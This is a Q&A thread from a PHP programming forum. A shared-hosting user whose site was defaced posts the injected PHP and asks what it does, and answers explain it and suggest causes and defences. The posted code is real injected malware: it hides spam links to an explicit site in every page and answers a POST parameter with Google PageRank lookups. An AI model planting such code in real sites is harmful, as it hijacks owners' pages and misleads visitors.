# my site got defaced. how to protect myself on shared hosting?

Tags: php

i have godaddy shared hosting and the site got defaced. whose at fault? the site is created with php is it possible the person can get in through some vunerability on my site and modify a file? or is that all through server side being that godaddy wasnt secure enough?

this is what was injected in a file. what does it do?

```
<?php
//{{1311051f

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)
{
  $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="http://www.wcvi.org/community_development/ecogardners/fresh/blow-jobs-teen/blow-jobs-teen.html">blow jobs teen</a><br></div></SPAN>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}

function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}

if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
else
  ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}75671d8f
?>
```

Comment: Is it the only file from the attack payload?

Answer (score 9):

Chances are it was an exploit from a package you use on your site (such as phpBB, phpNuke, etc.) people crawl the web looking for the vulnerable hosts and exploit the ones they can. The code is open-source and readily available so there's not much you can do for protection other than use the latest version.

Companies like [PacketStormSecurity](http://www.packetstormsecurity.com/) make it easy for "skript kiddies" to find a PoC (Proof of Concept) script and they take it upon themselves to try it on every site they can. Some are as easy as a [crafted google query](http://www.google.com/#sclient=psy&hl=en&safe=off&q=inurl%3aphpbb+v3+%2B%22view+topic%22&aq=f&aqi=&aql=&oq=&pbx=1&fp=7828c4946c5db268) to find a list of potential targets.

You may be able to look through your logs for a GET url that resulted in the exploit, but best-case scenario is just stay as up-to-date as possible, and never rely on your host to make restore-able backups of your site.

Comment: This seems like the most likely scenario, imo.

Comment: thing is though i wasnt using a 3rd party. the site is made from scratch

Comment: Then go through your site and confirm that every potential GET and POST variable is checked and verified. Some just crawl websites looking for a `<form>` and insert malicious code in any of the input fields hoping for something to go estranged.

Comment: i'm sure there were posts and gets that werent sanitized since the site wasnt made public yet. but just hosted as public. what i dont understand though is how a file can be physically modified through a get or post. wouldnt it be through ftp only?

Comment: @sarmenhbsam: Depends on the case. As with most situations, this box isn't dedicated for his/her website, thus getting access to to the box means access to all sites contained within. From there, they all use typical virtual paths (especially being as popular as GoDaddy is). The cracker just goes through and hijacks all the other directories on the same box. -- And it is possible, depending the implementation of the site, to get file access through a GET/POST. You just have to play around and see what the outcome of your trials are.

Answer (score 1):

The real deal to this hack is here:  http://frazierit.com/blog/?p=103

No SQL injection, no secret sauce, these guys were listening to the wire, or there is an agent on some machine that you use passing keystrokes their way, and you were using a clear text password FTP to work with your site.  They gained FTP access to your site, and systematically injected code into .php and .html pages on your site.  They are building/have built a distributed network of page ranking testers via numerous ISPs.  Probably to validate SEO operations.  Easy to clean, just need to go some command line regex work.

-Drew

Answer (score 0):

The script allows someone to specify a URL to the script using the variable xxxprch.  It checks the hash of the URL to make sure it conforms to some standard and searches google for the URL.  It then checks to see if there is the word "rank_" in the search results and gets the next 9 characters following "rank_" and returns them to be displayed on the user screen.

If the user didn't specify a variable in xxxprch then it automatically writes out to the page links to a sexually explicit website.

Note: If you get a Virtual Private Server (can be found for as cheap as $3 a month), you can install mod_security which prevents a lot of these types of attacks.  On the other hand you would then need to keep the OS up to date.

Answer (score -7):

I hate to say this but you are at fault. SQL/HTML/JS/code injection is your responsibility to handle. Also choosing a strong password is critical. It is totally possible for anyone to find a vulnerability and do anything.

It looks like that code is injecting links and somehow getting the Google page rank for some reason.

I think it falls under one of the Pragmatic Programmer's principles:

> **``select’’ Isn’t Broken** It is rare to
>   find a bug in the OS or the compiler,
>   or even a third-party product or
>   library. The bug is most likely in the
>   application.

Replace OS/compiler/3rd-party library with shared hosting.

Comment: so thourhg sql injection my site can be modified even though the content doesnt interact with sql?

Comment: What makes you jump to the conclusion it's SQL/code injection from his web app?  What from the post indicates that it's his fault?  Aside from statistics, I'm confused by this conclusion...

Comment: @ircmaxell - SQL/code injection is nearly always the applications fault.

Comment: @sarmenhbsam - i wasn't sure if it does or not. but sql injection is quite common - its one way for things to slip in.

Comment: @Dan: Out of all of the defacements that I investigated, a significant percentage were do to the shared host (not the majority, but also above 1%).  It's a little bit different comparing a security vulnerability to a compiler bug...  I would have had gladly +1ed if you would have at least contributed something besides *yes it's your fault* and gave some advice on how to proceed...

Comment: GoDaddy provides one-click installs of a lot of popular CMSes etc., including WordPress. They're often several versions behind, and they don't update installs either. Add in shared hosting where someone else on the server may have been compromised, and GoDaddy's general incompetence with hosting, and blaming the OP is really a big assumption to make.

Comment: if i were to call godaddy they would blame me. it can be my fault. i am testing it as best as i can to see how it was done.